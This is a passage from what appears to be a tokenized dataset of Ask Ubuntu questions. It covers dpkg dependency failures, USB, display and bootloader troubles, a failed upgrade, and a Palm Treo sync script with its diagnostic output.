linux-image-extra-3.13.0-35-generic ; however : package linux-image-extra-3.13.0-35-generic is not configured yet . dpkg : error processing package linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.13.0-35-generic linux-image-extra-3.13.0-35-generic linux-image-generic
517862	copy files to usb problem	iâm using ubuntu 14.04 and when i copy files to a usb stick ( format fat32 ) the files do get copied onto the usb ok and can be accessed while its plugged into my ubuntu laptop . but its when i try to use the usb stick on other computers , windows or mac the files ( which are compatible on all os systems ) can not be view , used or the usb stick appears to be empty . except when i plug it back into my ubuntu laptop the files are there and works . i have also tried other usb sticks and ext hard drives i still have the same problem . any help would be great , i really do n't want to go back to using windows .
517863	( qml ) which components do i want to invoke for notifcations and dialogues on ubuntu touch ?	now of course i can make any sort of notification or dialogue i want . however , i want to know what the ubuntu style guide recommends for notifications and dialogues . a notifcation could be : song playing : popey and the pussycats - micheal hall is my best friend warning : ubottu has gone rogue , and is attempting to install windows me on to your device mark shuttleworth messages you : `` badminton at 7 ? '' a dialogue could be : you are creating a new event for all day september 12th , 2014 , `` ubuntu global jam '' . confirm | cancel accept david planella 's frienster request ? yes | no do you wish to restart the phone ? restart | shutdown | sleep screenshots welcome~
517866	wifi not working for time warner cable modem	hi i just subscribed for time warner cable internet . they gave me a ubee dw335 cable modem . i have ubuntu 14.04 installed and the wifi does not connect only on this particular time warner network . the wifi works properly on other networks . i have a lenovo y510p laptop . detail info on below link http : //pastebin.ubuntu.com/8184049/
517868	palm treo 700p : not an mtp device	palm treo 700p : not an mtp device ( syslog error ) : jpilot hotsync timeout the phone is ancient by today 's standards , but it does what i need and i like it . two or three ubuntu os upgrades ago jpilot stopped being able to sync with my phone . i had limited internet access , and my search turned up articles saying it was discontinued due to it being outdated , and minimal usage . i now have some time to research and i 've found lots of documents about how to get it working on older version , and all the different work arounds that have occurred over the years and i 've made it to this point . i need some help . using all the help docs , and discussion threads , i pieced together these steps , and tossed them in a script ( easier to tests the results ) . ~ $ cat palm_treo_usb.sh echo `` ************** starting *****************\n '' ; echo `` ************** modprobe usbserial *****************\n '' ; /sbin/modprobe usbserial ; echo `` ************** modprobe visor *****************\n '' ; /sbin/modprobe visor echo `` ************** lsmod *****************\n '' ; /sbin/lsmod | grep `` [ v|u ] [ i|s ] [ s|b ] '' ; echo `` ************** groups *****************\n '' ; cat /etc/group | grep dial ; cat /etc/group | grep tty ; echo `` ************** modprobe *****************\n '' ; modprobe visor product=0x61 vendor=0x830 ; tail -n20 /var/log/kern.log |grep -a25 `` device disconnected '' | grep `` [ u|u|j|v|p ] [ s|s|i|p ] [ b|b|s|i|l ] '' | grep -v logitech | grep `` aug 29 '' ; rm /dev/ttyusb0 ; rm /dev/ttyusb1 ; # rm /dev/ttyusb2 ; rm /dev/ttyusb3 ; ls -al /dev/ttyusb* ; echo `` ************** proc devices *****************\n '' ; cat /proc/devices | grep `` [ u|u ] [ s|s ] [ b|b ] '' ; echo `` ************** mknob 0 *****************\n '' ; /bin/mknod /dev/ttyusb0 c 188 0 ; echo `` ************** mknob 1 *****************\n '' ; /bin/mknod /dev/ttyusb1 c 188 1 ; # echo `` ************** mknob 2 *****************\n '' ; # /bin/mknod /dev/ttyusb2 c 188 2 ; echo `` ************** mknob 3 *****************\n '' ; /bin/mknod /dev/ttyusb3 c 188 3 ; echo `` ************** chmod and chown *****************\n '' ; chmod 0666 /dev/ttyusb* ; chown root : dialout /dev/ttyusb* ; echo `` ************** /dev/ttyusb* *****************\n '' ; ls -al /dev/ttyusb* ; echo `` ************** pilot.rules *****************\n '' ; # ls -al /etc/udev/rules.d/pilot.rules ; # echo 'bus== '' usb '' , sysfs { product } == '' palm handheld*|handspring * '' , kernel== '' ttyusb* '' , name= '' ttyusb % n '' , symlink= '' pilot '' , group= '' esouthworth '' , mode= '' 0666 '' ' > > /etc/udev/rules.d/pilot.rules ; ls -al /etc/udev/rules.d/palmtreo.rules ; cat /etc/udev/rules.d/palmtreo.rules ; echo `` ************** pilot-dlpsh 0 *****************\n '' ; pilot-dlpsh -c -- port=/dev/ttyusb0 & echo `` ************** pilot-dlpsh 1 *****************\n '' ; pilot-dlpsh -c -- port=/dev/ttyusb1 & echo `` ************** pilot-dlpsh 2 *****************\n '' ; pilot-dlpsh -c -- port=/dev/ttyusb2 & echo `` ************** pilot-dlpsh 3 *****************\n '' ; pilot-dlpsh -c -- port=/dev/ttyusb3 & echo `` ************** pilot-xfer 0 *****************\n '' ; pilot-xfer -l -- port=/dev/ttyusb0 & echo `` ************** pilot-xfer 1 *****************\n '' ; pilot-xfer -l -- port=/dev/ttyusb1 & echo `` ************** pilot-xfer 2 *****************\n '' ; pilot-xfer -l -- port=/dev/ttyusb2 & echo `` ************** pilot-xfer 3 *****************\n '' ; pilot-xfer -l -- port=/dev/ttyusb3 & echo `` ************** /dev/ttyusb* *****************\n '' ; ls -al /dev/ttyusb* ; echo `` ************** /dev/bus/usb/* *****************\n '' ; ls -al /dev/bus/usb/* ; echo `` ************** /sys/dev/char/18* *****************\n '' ; ls -al /sys/dev/char/18* ; echo `` ************** /dev/usb/* *****************\n '' ; ls -al /dev/usb* ; tail -n20 /var/log/kern.log |grep -a25 `` device disconnected '' | grep `` [ u|u|j|v|p ] [ s|s|i|p ] [ b|b|s|i|l ] '' | grep -v logitech | grep `` aug 29 '' ; ps -aux | grep `` [ u|u|j|v|p ] [ s|s|i|p ] [ b|b|s|i|l ] '' | grep -v upstart ; echo `` ************** lsusb *****************\n '' ; lsusb | grep palm ; echo `` ************** sylog *****************\n '' ; tail -n20 /var/log/syslog | grep -a25 `` new full-speed usb device '' ; echo `` ************** ftdi_sio *****************\n '' ; modinfo ftdi_sio | head -n6 ; modinfo ftdi_sio | tail -n6 ; ps -aux | grep `` pilot '' ; ps -aux | grep `` usb '' ; ps -aux | grep `` mode '' ; this is my output results : root @ toshiba-satellite-p105 : /home/esouthworth # ./palm_treo_usb.sh ************** starting *****************\n ************** modprobe usbserial *****************\n ************** modprobe visor *****************\n ************** lsmod *****************\n visor 13355 0 usbserial 38603 1 visor usbhid 47361 0 hid 87370 3 hid_generic , usbhid ************** groups *****************\n dialout : x:20 : tty : x:5 : ************** modprobe *****************\n aug 29 23:08:44 toshiba-satellite-p105 kernel : [ 16985.437382 ] visor 2-2:1.0 : device disconnected aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16995.992056 ] usb 2-2 : new full-speed usb device number 5 using uhci_hcd aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156125 ] usb 2-2 : new usb device found , idvendor=0830 , idproduct=0061 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156136 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=5 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156143 ] usb 2-2 : product : palm handheld aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156149 ] usb 2-2 : manufacturer : palm , inc. aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156155 ] usb 2-2 : serialnumber : palmsn12345678 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160134 ] visor 2-2:1.0 : handspring visor / palm os converter detected aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160433 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb0 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160674 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb1 crw-rw-rw- 1 root dialout 188 , 2 aug 29 22:47 /dev/ttyusb2 ************** proc devices *****************\n 180 usb 188 ttyusb 189 usb_device ************** mknob 0 *****************\n ************** mknob 1 *****************\n ************** mknob 3 *****************\n ************** chmod and chown *****************\n ************** /dev/ttyusb* *****************\n crw-rw-rw- 1 root dialout 188 , 0 aug 29 23:09 /dev/ttyusb0 crw-rw-rw- 1 root dialout 188 , 1 aug 29 23:09 /dev/ttyusb1 crw-rw-rw- 1 root dialout 188 , 2 aug 29 22:47 /dev/ttyusb2 crw-rw-rw- 1 root dialout 188 , 3 aug 29 23:09 /dev/ttyusb3 ************** pilot.rules *****************\n -rw-r -- r -- 1 root root 141 aug 29 20:46 /etc/udev/rules.d/palmtreo.rules bus== '' usb '' , sysfs { product } == '' palm handheld*|handspring * '' , kernel== '' ttyusb* '' , name= '' ttyusb % n '' , symlink= '' pilot '' , group= '' dialout '' , mode= '' 0666 '' ************** pilot-dlpsh 0 *****************\n unable to determine port to bind please use -- help for more information ************** pilot-dlpsh 1 *****************\n unable to determine port to bind please use -- help for more information ************** pilot-dlpsh 2 *****************\n unable to determine port to bind please use -- help for more information ************** pilot-dlpsh 3 *****************\n unable to determine port to bind please use -- help for more information ************** pilot-xfer 0 *****************\n listening for incoming connection on /dev/ttyusb0 ... ************** pilot-xfer 1 *****************\n listening for incoming connection on /dev/ttyusb1 ... ************** pilot-xfer 2 *****************\n unable to bind to port : /dev/ttyusb2 please use -- help for more information ************** pilot-xfer 3 *****************\n unable to bind to port : /dev/ttyusb3 please use -- help for more information ************** /dev/ttyusb* *****************\n crw-rw-rw- 1 root dialout 188 , 0 aug 29 23:09 /dev/ttyusb0 crw-rw-rw- 1 root dialout 188 , 1 aug 29 23:09 /dev/ttyusb1 crw-rw-rw- 1 root dialout 188 , 2 aug 29 22:47 /dev/ttyusb2 crw-rw-rw- 1 root dialout 188 , 3 aug 29 23:09 /dev/ttyusb3 ************** /dev/bus/usb/* *****************\n /dev/bus/usb/001 : total 0 drwxr-xr-x 2 root root 60 aug 29 18:25 . drwxr-xr-x 7 root root 140 aug 29 18:25 .. crw-rw-r -- 1 root root 189 , 0 aug 29 18:25 001 /dev/bus/usb/002 : total 0 drwxr-xr-x 2 root root 80 aug 29 23:08 . drwxr-xr-x 7 root root 140 aug 29 18:25 .. crw-rw-r -- 1 root root 189 , 128 aug 29 18:25 001 crw-rw-r -- 1 root dialout 189 , 132 aug 29 23:08 005 /dev/bus/usb/003 : total 0 drwxr-xr-x 2 root root 80 aug 29 22:43 . drwxr-xr-x 7 root root 140 aug 29 18:25 .. crw-rw-r -- 1 root root 189 , 256 aug 29 18:25 001 crw-rw-r -- 1 root root 189 , 339 aug 29 22:43 084 /dev/bus/usb/004 : total 0 drwxr-xr-x 2 root root 60 aug 29 18:25 . drwxr-xr-x 7 root root 140 aug 29 18:25 .. crw-rw-r -- 1 root root 189 , 384 aug 29 18:25 001 /dev/bus/usb/005 : total 0 drwxr-xr-x 2 root root 60 aug 29 18:25 . drwxr-xr-x 7 root root 140 aug 29 18:25 .. crw-rw-r -- 1 root root 189 , 512 aug 29 18:25 001 ************** /sys/dev/char/18* *****************\n lrwxrwxrwx 1 root root 0 aug 29 22:44 /sys/dev/char/180:0 - > ../../devices/pci0000:00/0000:00:1d.1/usb3/3-2/3-2:1.1/usbmisc/hiddev0 lrwxrwxrwx 1 root root 0 aug 29 23:09 /sys/dev/char/188:0 - > ../../devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/ttyusb0/tty/ttyusb0 lrwxrwxrwx 1 root root 0 aug 29 23:09 /sys/dev/char/188:1 - > ../../devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/ttyusb1/tty/ttyusb1 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:0 - > ../../devices/pci0000:00/0000:00:1d.7/usb1 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:128 - > ../../devices/pci0000:00/0000:00:1d.0/usb2 lrwxrwxrwx 1 root root 0 aug 29 23:09 /sys/dev/char/189:132 - > ../../devices/pci0000:00/0000:00:1d.0/usb2/2-2 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:256 - > ../../devices/pci0000:00/0000:00:1d.1/usb3 lrwxrwxrwx 1 root root 0 aug 29 22:44 /sys/dev/char/189:339 - > ../../devices/pci0000:00/0000:00:1d.1/usb3/3-2 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:384 - > ../../devices/pci0000:00/0000:00:1d.2/usb4 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:512 - > ../../devices/pci0000:00/0000:00:1d.3/usb5 ************** /dev/usb/* *****************\n total 0 drwxr-xr-x 2 root root 60 aug 29 22:43 . drwxr-xr-x 18 root root 4300 aug 29 23:09 .. crw -- -- -- - 1 root root 180 , 0 aug 29 22:43 hiddev0 aug 29 23:08:44 toshiba-satellite-p105 kernel : [ 16985.437382 ] visor 2-2:1.0 : device disconnected aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16995.992056 ] usb 2-2 : new full-speed usb device number 5 using uhci_hcd aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156125 ] usb 2-2 : new usb device found , idvendor=0830 , idproduct=0061 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156136 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=5 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156143 ] usb 2-2 : product : palm handheld aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156149 ] usb 2-2 : manufacturer : palm , inc. aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156155 ] usb 2-2 : serialnumber : palmsn12345678 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160134 ] visor 2-2:1.0 : handspring visor / palm os converter detected aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160433 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb0 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160674 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb1 warning : bad ps syntax , perhaps a bogus '- ' ? see http : //gitorious.org/procps/procps/blobs/master/documentation/faq root 785 0.0 0.1 8340 3544 ? ss 18:26 0:00 /usr/sbin/cupsd -f root 875 0.0 0.1 6700 2160 ? ss 18:26 0:00 /sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasupplicant.pid -u -s -o /var/run/wpa_supplicant root 917 0.0 0.1 8628 2748 ? ss 18:26 0:00 /usr/sbin/cups-browsed whoopsie 1117 0.0 0.2 61792 4572 ? ssl 18:26 0:00 whoopsie 1000 2113 0.0 0.2 47324 4416 ? sl 18:26 0:00 /usr/lib/i386-linux-gnu/indicator-application-service 1000 2320 0.0 0.7 709228 16136 ? sl 18:27 0:01 nm-applet 1000 2497 0.0 1.6 424456 33920 ? sl 18:27 0:08 /usr/lib/i386-linux-gnu/indicator-applet-complete root 10712 0.0 0.0 2652 636 pts/3 s+ 23:09 0:00 pilot-xfer -l -- port=/dev/ttyusb0 root 10713 0.0 0.0 2652 636 pts/3 s+ 23:09 0:00 pilot-xfer -l -- port=/dev/ttyusb1 root 10734 0.0 0.0 4452 780 pts/3 s+ 23:09 0:00 grep [ u|u|j|v|p ] [ s|s|i|p ] [ b|b|s|i|l ] ************** lsusb *****************\n bus 002 device 005 : id 0830:0061 palm , inc. lifedrive / treo 650/680 / tunsten e2/t5/tx / centro / zire 21/31/72 / z22 ************** sylog *****************\n aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16995.992056 ] usb 2-2 : new full-speed usb device number 5 using uhci_hcd aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156125 ] usb 2-2 : new usb device found , idvendor=0830 , idproduct=0061 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156136 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=5 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156143 ] usb 2-2 : product : palm handheld aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156149 ] usb 2-2 : manufacturer : palm , inc. aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.156155 ] usb 2-2 : serialnumber : palmsn12345678 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160134 ] visor 2-2:1.0 : handspring visor / palm os converter detected aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160433 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb0 aug 29 23:08:54 toshiba-satellite-p105 kernel : [ 16996.160674 ] usb 2-2 : handspring visor / palm os converter now attached to ttyusb1 aug 29 23:08:54 toshiba-satellite-p105 mtp-probe : checking bus 2 , device 5 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-2 '' aug 29 23:08:54 toshiba-satellite-p105 mtp-probe : bus : 2 , device : 5 was not an mtp device aug 29 23:08:59 toshiba-satellite-p105 whoopsie [ 1117 ] : online ************** ftdi_sio *****************\n filename : /lib/modules/3.11.0-26-generic/kernel/drivers/usb/serial/ftdi_sio.ko license : gpl description : usb ftdi serial converters driver author : greg kroah-hartman < greg @ kroah.com > , bill ryder < bryder @ sgi.com > , kuba ober < kuba @ mareimbrium.org > , andreas mohr , johan hovold < jhovold @ gmail.com > srcversion : 3ec1b476ae6b01a3c7d57bf alias : usb : v05d1p8004d*dc*dsc*dp*ic*isc*ip*in* depends : usbserial intree : y vermagic : 3.11.0-26-generic smp mod_unload modversions 686 parm : vendor : user specified vendor id ( default=0x0403 ) ( ushort ) parm : product : user specified product id ( ushort ) parm : ndi_latency_timer : ndi device latency timer override ( int ) warning : bad ps syntax , perhaps a bogus '- ' ? see http : //gitorious.org/procps/procps/blobs/master/documentation/faq root 10712 0.0 0.0 2652 636 pts/3 s+ 23:09 0:00 pilot-xfer -l -- port=/dev/ttyusb0 root 10713 0.0 0.0 2652 636 pts/3 s+ 23:09 0:00 pilot-xfer -l -- port=/dev/ttyusb1 root 10746 0.0 0.0 4448 792 pts/3 s+ 23:09 0:00 grep pilot warning : bad ps syntax , perhaps a bogus '- ' ? see http : //gitorious.org/procps/procps/blobs/master/documentation/faq root 10748 0.0 0.0 4448 792 pts/3 s+ 23:09 0:00 grep usb warning : bad ps syntax , perhaps a bogus '- ' ? see http : //gitorious.org/procps/procps/blobs/master/documentation/faq root 735 0.0 0.1 7884 2932 ? ss 18:25 0:00 /usr/sbin/modem-manager root 10750 0.0 0.0 4452 796 pts/3 s+ 23:09 0:00 grep mode in jpilot when you click the hotsync it reports : syncing on device /dev/ttyusb0 press the hotsync button now and hangs out indefinitely ... i click the hotsync button on the phone , and it times out eventually with the error : '' the connection between your handheld computer and the desktop could not be established . please check you setup and try again . '' it 's palm v 2.5 , jpilot 1.8.1.2 # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy my best guess ( total guess at this point ) since i 'm shaky on how the connection between device 5 : usb 2-2 : ( 189 , 132 ) @ /dev/bus/usb/002 connects to /dev/ttyusb0 or /dev/ttyusb1 . there does n't seem to be any connection , and i 'm unsure how to make it . i 'm missing something , probably obvious to someone else who has n't been starring at this most of the day . any help getting me moving forward again is greatly appreciated ! /dev/bus/usb/002 : crw-rw-r -- 1 root dialout 189 , 132 aug 29 23:08 005 lrwxrwxrwx 1 root root 0 aug 29 18:59 /sys/dev/char/189:256 - > ../../devices/pci0000:00/0000:00:1d.1/usb3 lrwxrwxrwx 1 root root 0 aug 29 22:44 /sys/dev/char/189:339 - > ../../devices/pci0000:00/0000:00:1d.1/usb3/3-2 ************** pilot-xfer 0 *****************\n listening for incoming connection on /dev/ttyusb0 ... ************** pilot-xfer 1 *****************\n listening for incoming connection on /dev/ttyusb1 ... oh , and i did upgrade the mtp files ( usb-modeswitch , usb-modeswitch-data ) and verified that ftdi_sio is current , just in case it was causing the problem .
517869	shortcuts for external display/settings ? ( 14.04/unity de )	oh ! there may be more being asked here than this page is for , so please , feelfree to slip this query into the right page if that is at all possible . it is ultra-urgent , as we are now disabled by what has happened . i re-installed unity today , and it did solve problems i had with xfce . however , sine the onboard display dosnt work well , we use a plug in one . as soon as i re-installed unity de , i set it up so the onboard screen is switched off , and and the plugin one is default . however , i fired it back up this morning , and not only has ubuntu/unity forgotten my settings , but it has also got me right here now with the onboard screen as main ( my control panel is on it , and was simply by luck i blindly managed to open firefox in this screen am on right now . and also , as the two monitors , onboard and plug in , are two different sizes , so that causes problems if we cant get the plugin one to be default. , how do i disable onboard monitor and set as default the plug in monitor by shortcuts ? is that possible ? or can i cure it in a way that considers in cant get to my control panel/task bar on `` main screen '' ? really need fast answers here . we 're totally disabled now . i think this is an excellent problem to solve , as it is one of those situations where folk can get caught in and be really screwed if they cant get a solve for it . thank you all very kindly . ( and would love to give the answer to this to others in difficutly .
517871	network icon is not visible in my taskbar	i am using ubuntu 14.04 . always , if i could start the system , the network icon will be showing in a taskbar , but suddenly my network icon is not showing in the taskbar . please tell me how i can get it back . results of running killall nm-applet & & setsid nm-applet : -- -- -- -- -- nm-applet-message : using fallback from indicator to gtkstatusicon ( nm-applet:3647 ) : nm-applet-warning ** : could not find shellversion property on org.gnome.shell results of running setsid compiz -- replace & & setsid unity : error 2014-08-30 10:41:18 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'org.gnome.shell ' error 2014-08-30 10:41:18 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'com.canonical.unity'
517878	problem installing package	i 've faced following problems while installing packages- installarchives ( ) failed : e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.9.1-0ubuntu1_i386.deb containing libgcc1 : i386 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing archive /var/cache/apt/archives/libgcc1_1 % 3a4.9.1-0ubuntu1_i386.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 : i386 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.9.1-0ubuntu1_i386.deb error in function : dpkg : dependency problems prevent configuration of libc6 : i386 : libc6 : i386 depends on libgcc1 ; however : package libgcc1 is not installed . dpkg : error processing package libc6 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of multiarch-support : multiarch-support depends on libc6 ( > = 2.13-5 ) ; however : package libc6 : i386 is not configured yet . dpkg : error processing package multiarch-support ( -- configure ) : dependency problems - leaving unconfigured i 've tried the solutions given for problems related like this one , but none of those worked . this thing was shown after i 've given the command suggested by saptarshinag . sudo apt-get install debconf [ sudo ] password for mehnaz : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : debconf : predepends : perl-base ( > = 5.6.1-4 ) but it is not going to be installed recommends : apt-utils ( > = 0.5.1 ) but it is not going to be installed recommends : debconf-i18n but it is not going to be installed libc6 : depends : libgcc1 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
517885	gubuntu 14.04.1 : graphics reset ( gui - > cli - > gui remotely )	i am running ubuntu 14.04.1 , gnome flavor . let 's assume my amd graphics card has keeled over , but the os is still running fine . ( both fglrx and nouveau occasionally do this with a 30 '' 2560x1600 and a 28 '' -60hz-4k monitor . ) when this happens , i need to log into my computer remotely via ssh ( which i can do ) , become su , and then reset my graphics card . presumably i could drop from gui to non-gui and then run `` startx '' to get back a reinitialized graphics system . /etc/init.d/x11 restart did not do this : - ( . ps : how to switch from gui to cli mode and terminate any gui program ? is n't running for gubuntu
517887	cant get burg to load up on 14.04.1 lts with windows 8.1 pro	so i reinstalled the lts due to some issues and i decieded to try burg out . so installed it and everything and sudo burg-emu works and shows the theme installed working too . however it will show grub2 instead of burg . i realized i need to install burg to the mbr so i used grub customizer and did that but i get this error error while installing the bootloader /usr/sbin/burg-setup : warn : this gpt partition label has no bios boot partition ; embedding wo n't be possible ! . /usr/sbin/burg-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/burg-setup : error : if you really want blocklists , use -- force . i also noticed that when i update burg i get this error generating burg.cfg ... found linux image : /boot/vmlinuz-3.13.0-35-generic.efi.signed found linux image : /boot/vmlinuz-3.13.0-35-generic found initrd image : /boot/initrd.img-3.13.0-35-generic found linux image : /boot/vmlinuz-3.13.0-32-generic found initrd image : /boot/initrd.img-3.13.0-32-generic found windows boot manager on /dev/sda1 @ /efi/microsoft/boot/bootmgfw.efi windows boot manager is not yet supported by burg-mkconfig . done does anyone has clue what 's wrong here . : / my windows os is installed on sda3 .
517888	ca n't upgrade to 14.04 resolve generate blanks	i have spent hours trying to upgrade , reading the forum , trying solutions but unable to get really anywhere . it is my sons computer and all he does on it is play minecraft . please help and sorry if this is a duplicate . ca n't calculate upgrade error pkg problemresolver ; resolve generated breaks , this may be causes by installed held packages . usually means that your installed packages have unmet dependencies synaptic finds no broken packages to fix here is some data : log file 2014-08-30 07:13:50,756 info fixing components inconsistency from 'deb http : //archive.ubuntu.com/ubuntu trusty-updates universe' 2014-08-30 07:13:50,756 info to new entry 'deb http : //archive.ubuntu.com/ubuntu trusty-updates universe main restricted multiverse' 2014-08-30 07:13:52,913 debug running doupdate ( ) ( showerrors=true ) 2014-08-30 07:14:08,771 debug opencache ( ) 2014-08-30 07:14:08,772 debug failed to systemunlock ( ) ( e : not locked ) 2014-08-30 07:14:13,192 debug /opencache ( ) , new cache size 45280 2014-08-30 07:14:13,193 debug need_server_mode ( ) : run in 'desktop ' mode , ( because of key deps for 'ubuntu-desktop ' ) 2014-08-30 07:14:19,273 error dist-upgrade failed : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' 2014-08-30 07:14:19,274 debug abort called 2014-08-30 07:14:19,277 debug opencache ( ) 2014-08-30 07:14:23,519 debug /opencache ( ) , new cache size 43154 2014-08-30 07:14:23,519 debug enabling apt cron job sudo apt-get -f install ylan @ dylan-gj417aa-uuz-m8140-ch : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : appmenu-qt5 libdbusmenu-qt5 libhud-client2 libpocketsphinx1 libsphinxbase1 libunity-gtk2-parser0 libunity-gtk3-parser0 sphinx-voxforge-hmm-en sphinx-voxforge-lm-en unity-gtk-module-common unity-gtk2-module unity-gtk3-module use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . dylan @ dylan-gj417aa-uuz-m8140-ch : ~ $ auto remove the following packages will be removed : appmenu-qt5 libdbusmenu-qt5 libhud-client2 libpocketsphinx1 libsphinxbase1 libunity-gtk2-parser0 libunity-gtk3-parser0 sphinx-voxforge-hmm-en sphinx-voxforge-lm-en unity-gtk-module-common unity-gtk2-module unity-gtk3-module 0 upgraded , 0 newly installed , 12 to remove and 0 not upgraded . after this operation , 35.8 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 212158 files and directories currently installed . ) removing appmenu-qt5 ... removing libdbusmenu-qt5 : i386 ... removing libhud-client2 : i386 ... removing libpocketsphinx1 ... removing libsphinxbase1 ... removing unity-gtk2-module ... removing libunity-gtk2-parser0 ... removing unity-gtk3-module ... removing libunity-gtk3-parser0 ... removing sphinx-voxforge-hmm-en ... removing sphinx-voxforge-lm-en ... removing unity-gtk-module-common ... processing triggers for libc-bin ... dylan @ dylan-gj417aa-uuz-m8140-ch : ~ $ broken packages gedit broken libqt5svg5 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken qtdeclarative5-ubuntu-ui-toolkit-plugin : i386 depends on libqt5svg5 [ i386 ] < none - > 5.2.1-1 > ( libs ) broken libqt5printsupport5 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt5printsupport5 : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken libqt5printsupport5 : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.2.0 ) broken hud : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken hud : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken hud : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt5webkit5-qmlwebkitplugin : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0 ) broken webapp-container : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken webapp-container : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken webapp-container : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0~rc1 ) broken webapp-container : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0~rc1 ) broken webapp-container : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 